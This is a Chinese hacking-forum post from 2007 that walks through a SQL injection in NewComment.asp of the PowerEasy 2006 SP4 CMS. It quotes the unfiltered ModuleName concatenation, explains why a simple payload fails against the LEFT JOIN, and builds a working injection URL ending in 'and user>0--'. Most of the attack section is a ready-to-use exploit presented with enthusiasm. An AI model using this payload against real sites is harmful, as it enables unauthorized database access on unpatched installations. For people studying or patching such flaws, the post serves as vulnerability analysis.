动易2006 SP4 SQL版注入新发现..<br/><br/>by NetPatch & Trace<br/>www.icehack.com<br/>www.nspcn.org<br/><br/>晚上正无聊着瞎摆弄着,好友Trace突然发个消息过来,说让我看个动易的NewComment.asp文件。说是听说这个文件出了个注入漏洞,让我好好瞧瞧。反正也没事做,就瞒看了。<br/><br/>认真一看,还真是发现了漏洞所在。我们长话短说,直接进入话题。<br/>首先我们来看看主要的几个参数过滤情况<br/>ModuleName = Trim(request("ModuleName"))<br/>//只过滤两边空格---也是漏洞所在首要原因<br/>ChannelID = PE_CLng(Trim(request("ChannelID")))<br/>ClassID = PE_CLng(Trim(request("ClassID")))<br/>Num = PE_CLng(Trim(request("Num")))<br/>//其他三个都过滤的比较严格。<br/><br/>真搞不懂,为什么就ModuleName没过滤?难道是动易故意放水?<br/><br/>好,闲话少说,现在我们再看看问题所在的SQL语句<br/><br/>============================================================================================================================<br/>If ModuleName > 0 Then<br/> //假如ChannelID值不为0<br/>If ClassID <> 0 Then<br/> //假如ClassID值不为0<br/>sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True '获取指定模块中指定频道指定栏目的前Num条评论<br/><br/>//没经过任何过滤,直接执行了<br/>Else<br/>sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and C.Passed =" & PE_True '获取指定模块中指定频道的前Num条评论<br/>End If<br/>Else<br/>sqlComment = "Select top " & Num & " * From PE_Comment where ModuleType= " & ModuleId & " and Passed =" & PE_True '获取指定模块中的前Num条评论<br/>End If<br/>Else<br/>sqlComment = "Select top " & Num & " * from PE_Comment where Passed =" & PE_True '获取所有模块中的前Num条评论<br/>End If<br/>============================================================================================================================<br/><br/>/////////////////////////////////////////<br/>Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True<br/>//////////////////////////////////////////<br/>以上语句为漏洞存在语句<br/>发现此语句里也没对ModuleName进行过滤。HOHO,这不就常说的注入漏洞么!<br/>但是,请不要高兴的太早。因为这句SQL语句里有个小弯,如果没转过去,那可是要撞墙的哦。<br/>认真看下语句,你会发现,该语句使用了left join(外连接),如果直接构造NewComment.asp?num=1&ChannelID=1&&ClassID=1&ModuleName=soft and user>0--这样的URL是不可以成功的!为什么呢,其原因所在就是这个外连接语句!<br/>如果你把你构造的参数值和你想执行的SQL语句代到原SQL语句中的话,你会发现语句错了,错了的语句当然是没办法执行下去的了。<br/>/////////////////////////////////////////<br/>Select top 1 C.* from PE_Comment C left join PE_soft A on C.InfoID=A.soft and user>0--(后面的被注释了,就没必要代参数进去了)ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True<br/>//////////////////////////////////////////<br/>以上是代入SQL语句中的示范。<br/>======================================================================================<br/>Select top 1 C.* from PE_Comment C left join PE_soft A on C.InfoID=A.soft and user>0--<br/>======================================================================================<br/>这样的语句,试问,如何让他执行成功呢?<br/><br/>聪明的你肯定想到答案了吧。呵呵<br/>没错,既然这样的语句不能成功执行,那么我们就构造一个可以让他执行的语句!<br/><br/>/////////////////////////////////////////<br/>Select top 1 C.* from PE_Comment C left join PE_soft A on C.InfoID=A.soft A on C.InfoID=A.softID where A.ChannelID=1 and user>0--<br/>//////////////////////////////////////////<br/>再看看上面这段语句,是不是变的通顺了呢?<br/>好,我们现在还原到URL上<br/>============================================================================================================================<br/>NewComment.asp?num=1&ChannelID=1&ClassID=1&modulename=soft A on C.InfoID=A.softID where A.ChannelID=1 and user>0-- <br/>============================================================================================================================<br/>哈。。是不是成功了???<br/>YES,看来只要肯下工夫,漏洞始终是会浮出水面的!<br/>这里感谢Tarce,不是他,就没有这篇文章.
窥视卡
雷达卡
发表于 2007-7-15 22:22:39
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡